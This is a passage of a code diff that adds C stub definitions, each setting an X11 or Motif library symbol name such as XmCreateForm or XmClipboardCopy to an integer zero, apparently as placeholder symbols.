+int XiCreateStippledPixmap = 0;
+int _XiGetTabIndex = 0;
+int XIMOfIC = 0;
+int XInstallColormap = 0;
+int XInternAtom = 0;
+int XInternAtoms = 0;
+int XIntersectRegion = 0;
+int XiReleaseStippledPixmap = 0;
+int _XiResolveAllPartOffsets = 0;
+int XiResolveAllPartOffsets = 0;
+int XKeysymToKeycode = 0;
+int XKeysymToString = 0;
+int XLastKnownRequestProcessed = 0;
+int XListFonts = 0;
+int XListInstalledColormaps = 0;
+int XLoadQueryFont = 0;
+int XLookupString = 0;
+int Xm18IListUnselectAllItems = 0;
+int Xm18IListUnselectItem = 0;
+int _XmAccessColorData = 0;
+int XmActivateProtocol = 0;
+int _XmAddCallback = 0;
+int _XmAddGrab = 0;
+int _XmAddHashEntry = 0;
+int XmAddProtocolCallback = 0;
+int XmAddProtocols = 0;
+int _Xm_AddQueue = 0;
+int XmAddTabGroup = 0;
+int _XmAddTearOffEventHandlers = 0;
+int _XmAddToColorCache = 0;
+int XmAddToPostFromList = 0;
+int _XmAllocHashTable = 0;
+int _XmAllocMotifAtom = 0;
+int _XmAllocReceiverInfo = 0;
+int _XmAllocScratchPixmap = 0;
+int _XmAllowAcceleratedInsensitiveUnmanagedMenuItems = 0;
+int XMapRaised = 0;
+int XMapWindow = 0;
+int _XmArrowB_defaultTranslations = 0;
+int xmArrowButtonClassRec = 0;
+int xmArrowButtonGadgetClass = 0;
+int xmArrowButtonGadgetClassRec = 0;
+int xmArrowButtonWidgetClass = 0;
+int _XmArrowPixmapCacheCompare = 0;
+int _XmArrowPixmapCacheDelete = 0;
+int _XmAssignInsensitiveColor = 0;
+int _XmAssignLabG_MarginBottom = 0;
+int _XmAssignLabG_MarginHeight = 0;
+int _XmAssignLabG_MarginLeft = 0;
+int _XmAssignLabG_MarginRight = 0;
+int _XmAssignLabG_MarginTop = 0;
+int _XmAssignLabG_MarginWidth = 0;
+int XMaxRequestSize = 0;
+int _XmBackgroundColorDefault = 0;
+int _XmBaseClassPartInitialize = 0;
+int _XmBB_CreateButtonG = 0;
+int _XmBB_CreateLabelG = 0;
+int _XmBB_GetDialogTitle = 0;
+int _XmBBUpdateDynDefaultButton = 0;
+int XmbDrawImageString = 0;
+int XmbDrawString = 0;
+int _XmBlackPixel = 0;
+int XmbLookupString = 0;
+int _XmBottomShadowColorDefault = 0;
+int XmbResetIC = 0;
+int XmbTextEscapement = 0;
+int XmbTextExtents = 0;
+int XmbTextListToTextProperty = 0;
+int XmbTextPropertyToTextList = 0;
+int _XmBuildExtResources = 0;
+int _XmBuildGadgetResources = 0;
+int _XmBuildManagerResources = 0;
+int _XmBuildPrimitiveResources = 0;
+int _XmBuildResources = 0;
+int _XmBulletinB_defaultTranslations = 0;
+int _XmBulletinBoardCancel = 0;
+int xmBulletinBoardClassRec = 0;
+int _XmBulletinBoardFocusMoved = 0;
+int _XmBulletinBoardMap = 0;
+int _XmBulletinBoardReturn = 0;
+int _XmBulletinBoardSetDefaultShadow = 0;
+int _XmBulletinBoardSetDynDefaultButton = 0;
+int _XmBulletinBoardSizeUpdate = 0;
+int xmBulletinBoardWidgetClass = 0;
+int xmButtonBoxClassRec = 0;
+int xmButtonBoxWidgetClass = 0;
+int _XmButtonPopdownChildren = 0;
+int _XmButtonTakeFocus = 0;
+int _XmByteOrderChar = 0;
+int _XmCacheCopy = 0;
+int _XmCacheDelete = 0;
+int _XmCachePart = 0;
+int _XmCachePixmap = 0;
+int _XmCalcLabelDimensions = 0;
+int _XmCalcLabelGDimensions = 0;
+int _XmCallCallbackList = 0;
+int _XmCallFocusMoved = 0;
+int _XmCallRowColumnMapCallback = 0;
+int _XmCallRowColumnUnmapCallback = 0;
+int _XmCascadeB_menubar_events = 0;
+int _XmCascadeB_p_events = 0;
+int _XmCascadeBPrimClassExtRec = 0;
+int xmCascadeButtonClassRec = 0;
+int xmCascadeButtonGadgetClass = 0;
+int xmCascadeButtonGadgetClassRec = 0;
+int XmCascadeButtonGadgetHighlight = 0;
+int xmCascadeButtonGCacheObjClassRec = 0;
+int XmCascadeButtonHighlight = 0;
+int xmCascadeButtonWidgetClass = 0;
+int _XmCascadingPopup = 0;
+int _XmCBHelp = 0;
+int _XmCBNameActivate = 0;
+int _XmCBNameValueChanged = 0;
+int XmChangeColor = 0;
+int _XmChangeHSB = 0;
+int _XmChangeNavigationType = 0;
+int _XmChangeVSB = 0;
+int _XmCharsetCanonicalize = 0;
+int _XmCleanPixmapCache = 0;
+int _XmClearBCompatibility = 0;
+int _XmClearBGCompatibility = 0;
+int _XmClearBGPixmapName = 0;
+int _XmClearBorder = 0;
+int _XmClearDisplayTables = 0;
+int _XmClearDragReceiverInfo = 0;
+int _XmClearFocusPath = 0;
+int _XmClearIconPixmapName = 0;
+int _XmClearKbdFocus = 0;
+int _XmClearRect = 0;
+int _XmClearShadowType = 0;
+int _XmClearTabGroup = 0;
+int _XmClearTraversal = 0;
+int XmClipboardBeginCopy = 0;
+int XmClipboardCancelCopy = 0;
+int XmClipboardCopy = 0;
+int XmClipboardCopyByName = 0;
+int XmClipboardEndCopy = 0;
+int XmClipboardEndRetrieve = 0;
+int XmClipboardInquireCount = 0;
+int XmClipboardInquireFormat = 0;
+int XmClipboardInquireLength = 0;
+int XmClipboardInquirePendingItems = 0;
+int XmClipboardLock = 0;
+int _XmClipboardPassType = 0;
+int XmClipboardRegisterFormat = 0;
+int XmClipboardRetrieve = 0;
+int XmClipboardStartCopy = 0;
+int XmClipboardStartRetrieve = 0;
+int XmClipboardUndoCopy = 0;
+int XmClipboardUnlock = 0;
+int XmClipboardWithdrawFormat = 0;
+int xmClipWindowClassRec = 0;
+int _XmClipWindowTranslationTable = 0;
+int xmClipWindowWidgetClass = 0;
+int _XmColorObjCache = 0;
+int _XmColorObjCacheDisplay = 0;
+int xmColorObjClass = 0;
+int xmColorObjClassRec = 0;
+int _XmColorObjCreate = 0;
+int xmColorSelectorClassRec = 0;
+int xmColorSelectorWidgetClass = 0;
+int xmColumnClassRec = 0;
+int xmColumnWidgetClass = 0;
+int xmCombinationBox2ClassRec = 0;
+int XmCombinationBox2GetArrow = 0;
+int XmCombinationBox2GetChild = 0;
+int XmCombinationBox2GetLabel = 0;
+int XmCombinationBox2GetList = 0;
+int XmCombinationBox2GetText = 0;
+int XmCombinationBox2GetValue = 0;
+int xmCombinationBox2WidgetClass = 0;
+int XmCombinationBoxGetValue = 0;
+int XmComboBoxAddItem = 0;
+int xmComboBoxClassRec = 0;
+int _XmComboBox_defaultAccelerators = 0;
+int _XmComboBox_defaultTranslations = 0;
+int XmComboBoxDeletePos = 0;
+int _XmComboBox_dropDownComboBoxAccelerators = 0;
+int _XmComboBox_dropDownListTranslations = 0;
+int XmComboBoxSelectItem = 0;
+int XmComboBoxSetItem = 0;
+int _XmComboBox_textFocusTranslations = 0;
+int XmComboBoxUpdate = 0;
+int xmComboBoxWidgetClass = 0;
+int XmCommandAppendValue = 0;
+int xmCommandClassRec = 0;
+int XmCommandError = 0;
+int XmCommandGetChild = 0;
+int _XmCommandReturn = 0;
+int XmCommandSetValue = 0;
+int _XmCommandUpOrDown = 0;
+int xmCommandWidgetClass = 0;
+int XmCompareISOLatin1 = 0;
+int XmCompareXtWidgetGeometry = 0;
+int XmCompareXtWidgetGeometryToWidget = 0;
+int _XmComputeVisibilityRect = 0;
+int _XmConfigureObject = 0;
+int _XmConfigureWidget = 0;
+int xmContainerClassRec = 0;
+int XmContainerCopy = 0;
+int XmContainerCopyLink = 0;
+int XmContainerCut = 0;
+int _XmContainer_defaultTranslations = 0;
+int XmContainerGetItemChildren = 0;
+int XmContainerPaste = 0;
+int XmContainerPasteLink = 0;
+int XmContainerRelayout = 0;
+int XmContainerReorder = 0;
+int _XmContainer_traversalTranslations = 0;
+int xmContainerWidgetClass = 0;
+int _XmConvertActionParamToRepTypeId = 0;
+int _XmConvertComplete = 0;
+int _XmConvertCSToString = 0;
+int _XmConvertFactor = 0;
+int _XmConvertFloatUnitsToIntUnits = 0;
+int _XmConvertHandler = 0;
+int _XmConvertHandlerSetLocal = 0;
+int _XmConvertStringToUnits = 0;
+int XmConvertStringToUnits = 0;
+int _XmConvertToBW = 0;
+int _XmConvertUnits = 0;
+int XmConvertUnits = 0;
+int _XmCopyCursorIconQuark = 0;
+int XmCopyISOLatin1Lowered = 0;
+int _XmCountVaList = 0;
+int XmCreateArrowButton = 0;
+int XmCreateArrowButtonGadget = 0;
+int _XmCreateArrowPixmaps = 0;
+int XmCreateBulletinBoard = 0;
+int XmCreateBulletinBoardDialog = 0;
+int XmCreateButtonBox = 0;
+int XmCreateCascadeButton = 0;
+int XmCreateCascadeButtonGadget = 0;
+int XmCreateColorSelector = 0;
+int XmCreateColumn = 0;
+int XmCreateCombinationBox2 = 0;
+int XmCreateComboBox = 0;
+int XmCreateCommand = 0;
+int XmCreateCommandDialog = 0;
+int XmCreateContainer = 0;
+int XmCreateDataField = 0;
+int XmCreateDialogShell = 0;
+int XmCreateDragIcon = 0;
+int XmCreateDrawingArea = 0;
+int XmCreateDrawnButton = 0;
+int XmCreateDropDown = 0;
+int XmCreateDropDownComboBox = 0;
+int XmCreateDropDownList = 0;
+int XmCreateErrorDialog = 0;
+int XmCreateExt18List = 0;
+int XmCreateExtended18List = 0;
+int XmCreateFileSelectionBox = 0;
+int XmCreateFileSelectionDialog = 0;
+int _XmCreateFocusData = 0;
+int XmCreateFontSelector = 0;
+int XmCreateForm = 0;
+int XmCreateFormDialog = 0;
+int XmCreateFrame = 0;
+int XmCreateGrabShell = 0;
+int XmCreateIconBox = 0;
+int XmCreateIconButton = 0;
+int XmCreateIconGadget = 0;
+int XmCreateIconHeader = 0;
+int XmCreateInformationDialog = 0;
+int XmCreateLabel = 0;
+int XmCreateLabelGadget = 0;
+int XmCreateList = 0;
+int XmCreateMainWindow = 0;
+int XmCreateMenuBar = 0;
+int _XmCreateMenuCursor = 0;
+int XmCreateMenuShell = 0;
+int XmCreateMessageBox = 0;
+int XmCreateMessageDialog = 0;
+int XmCreateMultiList = 0;
+int XmCreateNotebook = 0;
+int XmCreateOptionMenu = 0;
+int XmCreateOutline = 0;
+int XmCreatePaned = 0;
+int XmCreatePanedWindow = 0;
+int XmCreatePopupMenu = 0;
+int XmCreatePromptDialog = 0;
+int XmCreatePulldownMenu = 0;
+int XmCreatePushButton = 0;
+int XmCreatePushButtonGadget = 0;
+int XmCreateQuestionDialog = 0;
+int XmCreateRadioBox = 0;
+int _XmCreateRenderTable = 0;
+int _XmCreateRendition = 0;
+int XmCreateRowColumn = 0;
+int XmCreateScale = 0;
+int XmCreateScrollBar = 0;
+int XmCreateScrolledList = 0;
+int XmCreateScrolledText = 0;
+int XmCreateScrolledWindow = 0;
+int XmCreateSelectionBox = 0;
+int XmCreateSelectionDialog = 0;
+int XmCreateSeparator = 0;
+int XmCreateSeparatorGadget = 0;
+int XmCreateSimpleCheckBox = 0;
+int XmCreateSimpleMenuBar = 0;
+int XmCreateSimpleOptionMenu = 0;
+int XmCreateSimplePopupMenu = 0;
+int XmCreateSimplePulldownMenu = 0;
+int XmCreateSimpleRadioBox = 0;
+int XmCreateSimpleSpinBox = 0;
+int XmCreateSpinBox = 0;
+int _XmCreateTab = 0;
+int XmCreateTabBox = 0;
+int _XmCreateTabList = 0;
+int XmCreateTabStack = 0;
+int XmCreateTemplateDialog = 0;
+int XmCreateText = 0;
+int XmCreateTextField = 0;
+int XmCreateToggleButton = 0;
+int XmCreateToggleButtonGadget = 0;
+int XmCreateTree = 0;
+int _XmCreateVisibilityRect = 0;
+int XmCreateWarningDialog = 0;
+int XmCreateWorkArea = 0;
+int XmCreateWorkingDialog = 0;
+int XmCvtByteStreamToXmString = 0;
+int XmCvtCTToXmString = 0;
+int XmCvtFromHorizontalPixels = 0;
+int XmCvtFromVerticalPixels = 0;
+int XmCvtStringToUnitType = 0;
+int XmCvtTextPropertyToXmStringTable = 0;
+int XmCvtTextToXmString = 0;
+int XmCvtToHorizontalPixels = 0;
+int XmCvtToVerticalPixels = 0;
+int XmCvtXmStringTableToTextProperty = 0;
+int XmCvtXmStringToByteStream = 0;
+int _XmCvtXmStringToCT = 0;
+int XmCvtXmStringToCT = 0;
+int XmCvtXmStringToText = 0;
+int _XmCvtXmStringToUTF8String = 0;
+int XmCvtXmStringToUTF8String = 0;
+int _XmDataF_EventBindings1 = 0;
+int _XmDataF_EventBindings2 = 0;
+int _XmDataF_EventBindings3 = 0;
+int _XmDataF_EventBindings4 = 0;
+int xmDataFieldClassRec = 0;
+int _XmDataFieldConvert = 0;
+int XmDataFieldCopy = 0;
+int _XmDataFieldCountBytes = 0;
+int XmDataFieldCut = 0;
+int _XmDataFieldDeselectSelection = 0;
+int XmDataFielddf_ClearSelection = 0;
+int _XmDataFielddf_SetCursorPosition = 0;
+int XmDataFielddf_SetCursorPosition = 0;
+int _XmDataFielddf_SetDestination = 0;
+int _XmDataFieldDrawInsertionPoint = 0;
+int XmDataFieldGetAddMode = 0;
+int XmDataFieldGetBaseline = 0;
+int XmDataFieldGetCursorPosition = 0;
+int _XmDataFieldGetDropReciever = 0;
+int XmDataFieldGetEditable = 0;
+int XmDataFieldGetInsertionPosition = 0;
+int XmDataFieldGetLastPosition = 0;
+int XmDataFieldGetMaxLength = 0;
+int XmDataFieldGetSelection = 0;
+int XmDataFieldGetSelectionPosition = 0;
+int XmDataFieldGetSelectionWcs = 0;
+int XmDataFieldGetString = 0;
+int XmDataFieldGetStringWcs = 0;
+int XmDataFieldGetSubstring = 0;
+int XmDataFieldGetSubstringWcs = 0;
+int XmDataFieldInsert = 0;
+int XmDataFieldInsertWcs = 0;
+int _XmDataFieldLoseSelection = 0;
+int XmDataFieldPaste = 0;
+int XmDataFieldPosToXY = 0;
+int XmDataFieldRemove = 0;
+int XmDataFieldReplace = 0;
+int _XmDataFieldReplaceText = 0;
+int XmDataFieldReplaceWcs = 0;
+int XmDataFieldSetAddMode = 0;
+int _XmDataFieldSetClipRect = 0;
+int XmDataFieldSetEditable = 0;
+int XmDataFieldSetHighlight = 0;
+int XmDataFieldSetInsertionPosition = 0;
+int XmDataFieldSetMaxLength = 0;
+int _XmDataFieldSetSel2 = 0;
+int XmDataFieldSetSelection = 0;
+int XmDataFieldSetString = 0;
+int XmDataFieldShowPosition = 0;
+int _XmDataFieldStartSelection = 0;
+int xmDataFieldWidgetClass = 0;
+int XmDataFieldXYToPos = 0;
+int _XmDataFPrimClassExtRec = 0;
+int _XmDataFToggleCursorGC = 0;
+int XmDeactivateProtocol = 0;
+int _XmDefaultColorObj = 0;
+int _XmDefaultDragIconQuark = 0;
+int _XmdefaultTextActionsTable = 0;
+int _XmdefaultTextActionsTableSize = 0;
+int _XmDefaultVisualResources = 0;
+int xmDesktopClass = 0;
+int xmDesktopClassRec = 0;
+int xmDesktopObjectClass = 0;
+int _XmDestinationHandler = 0;
+int _XmDestroyDefaultDragIcon = 0;
+int _XmDestroyFocusData = 0;
+int _XmDestroyMotifWindow = 0;
+int _XmDestroyParentCallback = 0;
+int XmDestroyPixmap = 0;
+int _XmDestroyTearOffShell = 0;
+int xmDialogShellClassRec = 0;
+int xmDialogShellExtClassRec = 0;
+int xmDialogShellExtObjectClass = 0;
+int xmDialogShellWidgetClass = 0;
+int _XmDifferentBackground = 0;
+int _XmDirectionDefault = 0;
+int XmDirectionMatch = 0;
+int XmDirectionMatchPartial = 0;
+int XmDirectionToStringDirection = 0;
+int _XmDismissTearOff = 0;
+int _XmDispatchGadgetInput = 0;
+int _XmDisplay_baseTranslations = 0;
+int xmDisplayClass = 0;
+int xmDisplayClassRec = 0;
+int xmDisplayObjectClass = 0;
+int _XmDoGadgetTraversal = 0;
+int XmDragCancel = 0;
+int _XmDragC_defaultTranslations = 0;
+int xmDragContextClass = 0;
+int xmDragContextClassRec = 0;
+int xmDragIconClassRec = 0;
+int _XmDragIconClean = 0;
+int _XmDragIconIsDirty = 0;
+int xmDragIconObjectClass = 0;
+int _XmDragOverChange = 0;
+int _XmDragOverFinish = 0;
+int _XmDragOverGetActiveCursor = 0;
+int _XmDragOverHide = 0;
+int _XmDragOverMove = 0;
+int _XmDragOverSetInitialPosition = 0;
+int xmDragOverShellClassRec = 0;
+int xmDragOverShellWidgetClass = 0;
+int _XmDragOverShow = 0;
+int XmDragStart = 0;
+int _XmDragUnderAnimation = 0;
+int _XmDrawArrow = 0;
+int XmDrawBevel = 0;
+int _XmDrawBorder = 0;
+int _XmDrawDiamond = 0;
+int _XmDrawDiamondButton = 0;
+int _XmDrawHighlight = 0;
+int _XmDrawingA_defaultTranslations = 0;
+int xmDrawingAreaClassRec = 0;
+int _XmDrawingAreaInput = 0;
+int xmDrawingAreaWidgetClass = 0;
+int _XmDrawingA_traversalTranslations = 0;
+int _XmDrawnB_defaultTranslations = 0;
+int _XmDrawnB_menuTranslations = 0;
+int _XmDrawnBPrimClassExtRec = 0;
+int xmDrawnButtonClassRec = 0;
+int xmDrawnButtonWidgetClass = 0;
+int _XmDrawSeparator = 0;
+int _XmDrawShadow = 0;
+int _XmDrawShadows = 0;
+int _XmDrawShadowType = 0;
+int _XmDrawSimpleHighlight = 0;
+int _XmDrawSquareButton = 0;
+int xmDropDownClassRec = 0;
+int XmDropDownGetArrow = 0;
+int XmDropDownGetChild = 0;
+int XmDropDownGetLabel = 0;
+int XmDropDownGetList = 0;
+int XmDropDownGetText = 0;
+int XmDropDownGetValue = 0;
+int xmDropDownWidgetClass = 0;
+int XmDropSiteConfigureStackingOrder = 0;
+int XmDropSiteEndUpdate = 0;
+int XmDropSiteGetActiveVisuals = 0;
+int xmDropSiteManagerClassRec = 0;
+int xmDropSiteManagerObjectClass = 0;
+int XmDropSiteQueryStackingOrder = 0;
+int XmDropSiteRegister = 0;
+int XmDropSiteRegistered = 0;
+int XmDropSiteRetrieve = 0;
+int _XmDropSiteShell = 0;
+int XmDropSiteStartUpdate = 0;
+int XmDropSiteUnregister = 0;
+int XmDropSiteUpdate = 0;
+int _XmDropSiteWrapperCandidate = 0;
+int XmDropTransferAdd = 0;
+int xmDropTransferClassRec = 0;
+int xmDropTransferObjectClass = 0;
+int XmDropTransferStart = 0;
+int _XmDSIAddChild = 0;
+int _XmDSIDestroy = 0;
+int _XmDSIGetBorderWidth = 0;
+int _XmDSIGetChildPosition = 0;
+int _XmDSIRemoveChild = 0;
+int _XmDSIReplaceChild = 0;
+int _XmDSISwapChildren = 0;
+int _XmDSMGetTreeFromDSM = 0;
+int _XmDSMUpdate = 0;
+int _XmDSResources = 0;
+int XmeAddFocusChangeCallback = 0;
+int XmeClearBorder = 0;
+int XmeClipboardSink = 0;
+int XmeClipboardSource = 0;
+int XmeConfigureObject = 0;
+int XmeConvertMerge = 0;
+int XmeCountVaListSimple = 0;
+int XmeCreateClassDialog = 0;
+int _XmEditResCheckMessages = 0;
+int XmeDragSource = 0;
+int XmeDrawArrow = 0;
+int XmeDrawCircle = 0;
+int XmeDrawDiamond = 0;
+int XmeDrawHighlight = 0;
+int XmeDrawIndicator = 0;
+int XmeDrawPolygonShadow = 0;
+int XmeDrawSeparator = 0;
+int XmeDrawShadows = 0;
+int XmeDropSink = 0;
+int XmeFlushIconFileCache = 0;
+int XmeFocusIsInShell = 0;
+int XmeFromHorizontalPixels = 0;
+int XmeFromVerticalPixels = 0;
+int XmeGetColorObjData = 0;
+int XmeGetDefaultPixel = 0;
+int XmeGetDefaultRenderTable = 0;
+int XmeGetDesktopColorCells = 0;
+int XmeGetDirection = 0;
+int XmeGetEncodingAtom = 0;
+int XmeGetHomeDirName = 0;
+int XmeGetIconControlInfo = 0;
+int XmeGetLocalizedString = 0;
+int XmeGetMask = 0;
+int XmeGetNextCharacter = 0;
+int XmeGetNullCursor = 0;
+int XmeGetPixelData = 0;
+int XmeGetPixmapData = 0;
+int XmeGetTextualDragIcon = 0;
+int XmeMicroSleep = 0;
+int _XmEmptyRect = 0;
+int XmeNamedSink = 0;
+int XmeNamedSource = 0;
+int XmeNamesAreEqual = 0;
+int XmeNavigChangeManaged = 0;
+int _XmEnterGadget = 0;
+int _XmEnterRowColumn = 0;
+int _XmEntryByteCountGet = 0;
+int _XmEntryCacheGet = 0;
+int _XmEntryCharCountGet = 0;
+int _XmEntryDirectionGet = 0;
+int _XmEntryDirectionSet = 0;
+int _XmEntryPopGet = 0;
+int _XmEntryPushGet = 0;
+int _XmEntryRendBeginCountGet = 0;
+int _XmEntryRendBeginGet = 0;
+int _XmEntryRendBeginSet = 0;
+int _XmEntryRendEndCountGet = 0;
+int _XmEntryRendEndGet = 0;
+int _XmEntryRendEndSet = 0;
+int _XmEntryTabsGet = 0;
+int _XmEntryTag = 0;
+int _XmEntryTagSet = 0;
+int _XmEntryTextGet = 0;
+int _XmEntryTextSet = 0;
+int _XmEntryTextTypeGet = 0;
+int XmeParseUnits = 0;
+int XmePrimarySink = 0;
+int XmePrimarySource = 0;
+int XmeQueryBestCursorSize = 0;
+int _XmEraseShadow = 0;
+int XmeRedisplayGadgets = 0;
+int XmeRemoveFocusChangeCallback = 0;
+int XmeRenderTableGetDefaultFont = 0;
+int XmeReplyToQueryGeometry = 0;
+int XmeResolvePartOffsets = 0;
+int XmeSecondarySink = 0;
+int XmeSecondarySource = 0;
+int XmeSecondaryTransfer = 0;
+int XmeSetWMShellTitle = 0;
+int XmeStandardConvert = 0;
+int XmeStandardTargets = 0;
+int XmeStringGetComponent = 0;
+int XmeStringIsValid = 0;
+int XmeToHorizontalPixels = 0;
+int XmeToVerticalPixels = 0;
+int XmeTraitGet = 0;
+int XmeTraitSet = 0;
+int XmeTransferAddDoneProc = 0;
+int XmeUseColorObj = 0;
+int XmeVirtualToActualKeysyms = 0;
+int XmeVLCreateWidget = 0;
+int XmeWarning = 0;
+int XME_WARNING = 0;
+int XmeXpmAttributesSize = 0;
+int XmeXpmCreateBufferFromImage = 0;
+int XmeXpmCreateBufferFromPixmap = 0;
+int XmeXpmCreateBufferFromXpmImage = 0;
+int XmeXpmCreateDataFromImage = 0;
+int XmeXpmCreateDataFromPixmap = 0;
+int XmeXpmCreateDataFromXpmImage = 0;
+int XmeXpmCreateImageFromBuffer = 0;
+int XmeXpmCreateImageFromData = 0;
+int XmeXpmCreateImageFromXpmImage = 0;
+int XmeXpmCreatePixmapFromBuffer = 0;
+int XmeXpmCreatePixmapFromData = 0;
+int XmeXpmCreatePixmapFromXpmImage = 0;
+int XmeXpmCreateXpmImageFromBuffer = 0;
+int XmeXpmCreateXpmImageFromData = 0;
+int XmeXpmCreateXpmImageFromImage = 0;
+int XmeXpmCreateXpmImageFromPixmap = 0;
+int XmeXpmFree = 0;
+int XmeXpmFreeAttributes = 0;
+int XmeXpmFreeExtensions = 0;
+int XmeXpmFreeXpmImage = 0;
+int XmeXpmFreeXpmInfo = 0;
+int XmeXpmGetErrorString = 0;
+int XmeXpmLibraryVersion = 0;
+int XmeXpmReadFileToBuffer = 0;
+int XmeXpmReadFileToData = 0;
+int XmeXpmReadFileToImage = 0;
+int XmeXpmReadFileToPixmap = 0;
+int XmeXpmReadFileToXpmImage = 0;
+int XmeXpmWriteFileFromBuffer = 0;
+int XmeXpmWriteFileFromData = 0;
+int XmeXpmWriteFileFromImage = 0;
+int XmeXpmWriteFileFromPixmap = 0;
+int XmeXpmWriteFileFromXpmImage = 0;
+int xmExt18ListClassRec = 0;
+int XmExt18ListDeselectItems = 0;
+int XmExt18ListDeselectRow = 0;
+int XmExt18ListGetSelectedRowArray = 0;
+int XmExt18ListGetSelectedRows = 0;
+int XmExt18ListMakeRowVisible = 0;
+int XmExt18ListSelectAllItems = 0;
+int XmExt18ListSelectItems = 0;
+int XmExt18ListSelectRow = 0;
+int XmExt18ListToggleRow = 0;
+int XmExt18ListUnselectAllItems = 0;
+int XmExt18ListUnselectItem = 0;
+int xmExt18ListWidgetClass = 0;
+int xmExtClassRec = 0;
+int _XmExtGetValuesHook = 0;
+int _XmExtHighlightBorder = 0;
+int _XmExtImportArgs = 0;
+int _XmExtObjAlloc = 0;
+int xmExtObjectClass = 0;
+int _XmExtObjFree = 0;
+int _XmExtUnhighlightBorder = 0;
+int _Xm_fastPtr = 0;
+int _XmFastSubclassInit = 0;
+int _XmFileSBGeoMatrixCreate = 0;
+int xmFileSelectionBoxClassRec = 0;
+int _XmFileSelectionBoxCreateDirList = 0;
+int _XmFileSelectionBoxCreateDirListLabel = 0;
+int _XmFileSelectionBoxCreateFilterLabel = 0;
+int _XmFileSelectionBoxCreateFilterText = 0;
+int _XmFileSelectionBoxFocusMoved = 0;
+int XmFileSelectionBoxGetChild = 0;
+int _XmFileSelectionBoxGetDirectory = 0;
+int _XmFileSelectionBoxGetDirListItemCount = 0;
+int _XmFileSelectionBoxGetDirListItems = 0;
+int _XmFileSelectionBoxGetDirListLabelString = 0;
+int _XmFileSelectionBoxGetDirMask = 0;
+int _XmFileSelectionBoxGetFilterLabelString = 0;
+int _XmFileSelectionBoxGetListItemCount = 0;
+int _XmFileSelectionBoxGetListItems = 0;
+int _XmFileSelectionBoxGetNoMatchString = 0;
+int _XmFileSelectionBoxGetPattern = 0;
+int _XmFileSelectionBoxNoGeoRequest = 0;
+int _XmFileSelectionBoxRestore = 0;
+int _XmFileSelectionBoxUpOrDown = 0;
+int xmFileSelectionBoxWidgetClass = 0;
+int XmFileSelectionDoSearch = 0;
+int _XmFilterArgs = 0;
+int _XmFilterResources = 0;
+int _XmFindNextTabGroup = 0;
+int _XmFindPrevTabGroup = 0;
+int _XmFindTabGroup = 0;
+int _XmFindTopMostShell = 0;
+int _XmFindTraversablePrim = 0;
+int _XmFocusInGadget = 0;
+int _XmFocusIsHere = 0;
+int _XmFocusIsInShell = 0;
+int _XmFocusModelChanged = 0;
+int _XmFocusOutGadget = 0;
+int XmFontListAdd = 0;
+int XmFontListAppendEntry = 0;
+int XmFontListCopy = 0;
+int XmFontListCreate = 0;
+int XmFontListCreate_r = 0;
+int XmFontListEntryCreate = 0;
+int XmFontListEntryCreate_r = 0;
+int XmFontListEntryFree = 0;
+int XmFontListEntryGetFont = 0;
+int XmFontListEntryGetTag = 0;
+int XmFontListEntryLoad = 0;
+int XmFontListFree = 0;
+int XmFontListFreeFontContext = 0;
+int _XmFontListGetDefaultFont = 0;
+int XmFontListGetNextFont = 0;
+int XmFontListInitFontContext = 0;
+int XmFontListNextEntry = 0;
+int XmFontListRemoveEntry = 0;
+int _XmFontListSearch = 0;
+int xmFontSelectorClassRec = 0;
+int xmFontSelectorWidgetClass = 0;
+int _XmForegroundColorDefault = 0;
+int xmFormClassRec = 0;
+int xmFormWidgetClass = 0;
+int xmFrameClassRec = 0;
+int _XmFrame_defaultTranslations = 0;
+int xmFrameWidgetClass = 0;
+int _XmFreeDragReceiverInfo = 0;
+int _XmFreeHashTable = 0;
+int _XmFreeMotifAtom = 0;
+int _XmFreeScratchPixmap = 0;
+int _XmFreeTravGraph = 0;
+int _XmFreeWidgetExtData = 0;
+int _XmFromHorizontalPixels = 0;
+int _XmFromLayoutDirection = 0;
+int _XmFromPanedPixels = 0;
+int _XmFromVerticalPixels = 0;
+int _XmGadClassExtRec = 0;
+int _XmGadgetActivate = 0;
+int _XmGadgetArm = 0;
+int _XmGadgetButtonMotion = 0;
+int xmGadgetClass = 0;
+int xmGadgetClassRec = 0;
+int _XmGadgetDrag = 0;
+int _XmGadgetGetValuesHook = 0;
+int _XmGadgetImportArgs = 0;
+int _XmGadgetImportSecondaryArgs = 0;
+int _XmGadgetKeyInput = 0;
+int _XmGadgetMultiActivate = 0;
+int _XmGadgetMultiArm = 0;
+int _XmGadgetSelect = 0;
+int _XmGadgetTraverseCurrent = 0;
+int _XmGadgetTraverseDown = 0;
+int _XmGadgetTraverseHome = 0;
+int _XmGadgetTraverseLeft = 0;
+int _XmGadgetTraverseNext = 0;
+int _XmGadgetTraverseNextTabGroup = 0;
+int _XmGadgetTraversePrev = 0;
+int _XmGadgetTraversePrevTabGroup = 0;
+int _XmGadgetTraverseRight = 0;
+int _XmGadgetTraverseUp = 0;
+int _XmGadgetWarning = 0;
+int _XmGeoAdjustBoxes = 0;
+int _XmGeoArrangeBoxes = 0;
+int _XmGeoBoxesSameHeight = 0;
+int _XmGeoBoxesSameWidth = 0;
+int _XmGeoClearRectObjAreas = 0;
+int _XmGeoCount_kids = 0;
+int _XmGeoGetDimensions = 0;
+int _XmGeoLoadValues = 0;
+int _XmGeoMatrixAlloc = 0;
+int _XmGeoMatrixFree = 0;
+int _XmGeoMatrixGet = 0;
+int _XmGeoMatrixSet = 0;
+int _XmGeometryEqual = 0;
+int _XmGeoReplyYes = 0;
+int _XmGeoSetupKid = 0;
+int _XmGetActiveDropSite = 0;
+int _XmGetActiveItem = 0;
+int _XmGetActiveProtocolStyle = 0;
+int _XmGetActiveTabGroup = 0;
+int _XmGetActiveTopLevelMenu = 0;
+int _XmGetActualClass = 0;
+int _XmGetArrowDrawRects = 0;
+int XmGetAtomName = 0;
+int _XmGetAudibleWarning = 0;
+int _XmGetBGPixmapName = 0;
+int _XmGetBitmapConversionModel = 0;
+int _XmGetBottomShadowColor = 0;
+int _XmGetClassExtensionPtr = 0;
+int _XmGetColorAllocationProc = 0;
+int XmGetColorCalculation = 0;
+int _XmGetColorCalculationProc = 0;
+int _XmGetColoredPixmap = 0;
+int _XmGetColors = 0;
+int XmGetColors = 0;
+int _XmGetDefaultBackgroundColorSpec = 0;
+int _XmGetDefaultColors = 0;
+int _XmGetDefaultDisplay = 0;
+int _XmGetDefaultFontList = 0;
+int _XmGetDefaultThresholdsForScreen = 0;
+int _XmGetDefaultTime = 0;
+int XmGetDestination = 0;
+int _XmGetDisplayObject = 0;
+int XmGetDragContext = 0;
